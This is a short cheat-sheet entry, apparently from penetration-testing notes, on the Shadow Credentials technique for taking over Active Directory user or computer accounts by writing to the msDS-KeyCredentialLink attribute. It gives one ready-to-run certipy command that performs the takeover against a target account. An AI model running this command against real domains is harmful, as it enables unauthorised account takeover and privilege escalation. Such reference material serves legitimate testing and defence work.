Shadow Credentials

Last modified: 2023-11-11

Active Directory Privilege Escalation Windows

Shadow Credentials is an attack technique to take over Active Directory user/computer account by compromising msDS-KeyCredentialLink property of target objects.


If the attacker can modify the target object's (user or computer account) attribute msDS-KeyCredentialLink and append it with alternate credentials in the form of certificates, he takes over the account in AD.

# -k: Use Kerberos authentication
certipy shadow auto -account "targetuser" -u "username@example.local" -p 'password' -dc-ip -target dc.example.local -k